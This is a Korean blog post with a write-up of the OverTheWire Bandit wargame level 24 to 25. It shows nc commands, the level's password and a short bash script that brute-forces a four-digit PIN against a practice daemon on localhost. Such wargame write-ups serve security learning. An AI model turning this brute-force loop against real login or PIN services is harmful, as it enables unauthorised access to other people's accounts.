티스토리 뷰

Wargame/Bandit

Bandit Level 24 → Level 25

장일영 2024. 5. 16. 13:33

 

Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time.

30002번 포트에서 실행되는 데몬이 있다. 이 데몬은 bandit24의 패스워드와 4자리 핀코드가 주어지면 bandit25의 패스워드를 반환한다. brute-forcing으로 10000가지 케이스를 모두 시도하는 방법 외에 핀코드를 찾을 수 있는 다른 방법은 없다.
매번 새로운 연결을 생성할 필요는 없다.
 

Write Up

bandit24@bandit:~$ nc -zv 127.0.0.1 30002
Connection to 127.0.0.1 30002 port [tcp/*] succeeded!

bandit24@bandit:~$ nc 127.0.0.1 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 1111
```

```shell
#!/bin/bash

start=$1
end=$2

seq -f %04g $1 $2 | xargs printf "VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar %s\n" | nc localhost 30002 | grep bandit25

 
시작 값과 끝 값을 입력 받고, 해당 범위 내에서 숫자를 증가시켜 원하는 응답만 출력하도록 하는 스크립트를 작성했다.

'Wargame > Bandit' 카테고리의 다른 글

Bandit Level 26 → Level 27  (0) 2024.05.16
Bandit Level 25 → Level 26  (0) 2024.05.16
Bandit Level 23 → Level 24  (0) 2024.05.16
Bandit Level 22 → Level 23  (0) 2024.05.16
Bandit Level 21 → Level 22  (0) 2024.05.16
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
«   2026/06   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30
글 보관함